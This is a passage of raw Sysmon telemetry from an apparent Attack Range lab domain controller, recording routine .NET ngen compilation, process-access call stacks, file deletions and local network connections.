be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.076{4DB9351A-A28C-60D3-0806-00000000CF01}2328NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MMPGRRUSHT\System.Xaml.Hosting.ni.dll.auxMD5=693772B3D9DE0D42B488A42E6A447DA4,SHA256=F2EA7F86FFA3AA4D2B60357AA05904744CD1D8BA10784202ABC91FECA7712AF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.076{4DB9351A-A28C-60D3-0806-00000000CF01}2328NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MMPGRRUSHT\System.Xaml.Hosting.ni.dllMD5=FB765556093D443D1DA4E2796FB7996C,SHA256=66DA746B2A13EB4A52F469B9EBB50DF9E5D3591E3FBFD40DBEE4CD28F7D52B77,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.076{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DD8-60D3-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000023962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.076{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.076{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.061{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28C-60D3-0806-00000000CF01}2328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.045{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A28C-60D3-0806-00000000CF01}2328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.045{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28C-60D3-0806-00000000CF01}2328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.045{4DB9351A-A28B-60D3-0706-00000000CF01}2036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\L1MZRKV8N9\System.WorkflowServices.ni.dll.auxMD5=E783477E1F07D6D121ABAE20BA727838,SHA256=F61514562DAEEAFE540DFCD51C93B31BF97779C6170D20C3F86638A9218BF561,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.045{4DB9351A-A28B-60D3-0706-00000000CF01}2036NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\L1MZRKV8N9\System.WorkflowServices.ni.dllMD5=EFCD384732462783625D41AD49087D03,SHA256=D378AAFB171756614D17F828C0DFFB2487BCFD6FF44A1F79D5919786A930E562,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.655{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28D-60D3-1406-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.624{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A28D-60D3-1406-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.624{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28D-60D3-1406-00000000CF01}5460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.624{4DB9351A-A28D-60D3-1306-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\845UL5YO7B\System.Core.ni.dll.auxMD5=5DAE1AC0A511DB8226CE54ED67EE62D0,SHA256=809C6CDBF1F64A3777B35BCDDBFFDEA9059E4D5864993FE5655AF094247D8735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024025Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.624{4DB9351A-A28D-60D3-1306-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\845UL5YO7B\System.Core.ni.dllMD5=96C3A1F95501960ACE4AFABBF30147F9,SHA256=17DD85722623BDB825F2A4C0CAB26F2C6DC123FB1E5CE889C6E3263B756E9BF9,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000024024Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.132{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61470-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024023Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:24.132{4DB9351A-9DD8-60D3-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61470-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local445microsoft-ds 354300x800000000000000024022Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:23.287{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61469-false10.0.1.12-8000- 23542300x800000000000000024021Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.248{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0938F67AC9E9F0704F4DBF2E65B597C,SHA256=3E04AEBDAF501BBF450507F6AA1323C2B534513703DFDB547B33565B70360AB1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024020Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.186{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28D-60D3-1306-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024019Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.170{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28D-60D3-1306-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024018Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.170{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28D-60D3-1306-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024017Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.170{4DB9351A-A28C-60D3-1206-00000000CF01}3992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6OMZIF0M7B\System.ni.dll.auxMD5=47D6C9DD7917E2F787BA947E20BC09EB,SHA256=716177BEEA97107F89D514584402965891162CE681EF39D3078CB63304ADE402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024016Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:25.170{4DB9351A-A28C-60D3-1206-00000000CF01}3992NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6OMZIF0M7B\System.ni.dllMD5=456DD8A98AB8EE3A27623A1B8922B575,SHA256=3EE8341CADBFA2C1B06FF49E0D612C5C295D31EC1D2412AC18AAF3CE400372DF,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.842{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A036-60D3-1101-00000000CF01}6784C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024044Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.780{4DB9351A-A036-60D3-1401-00000000CF01}54566840C:\Windows\system32\conhost.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024043Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.764{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024042Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.764{4DB9351A-A036-60D3-1101-00000000CF01}67842908C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{4DB9351A-A28E-60D3-1606-00000000CF01}6232C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+3d7ae(wow64)|UNKNOWN(0000000001084853)|UNKNOWN(0000000001084504)|UNKNOWN(00000000010854CE)|UNKNOWN(0000000001082845)|UNKNOWN(0000000001080F66)|UNKNOWN(0000000001080950)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+f036(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+122da(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1859b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+1992d7(wow64) 23542300x800000000000000024041Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.686{4DB9351A-A28E-60D3-1506-00000000CF01}5876NT 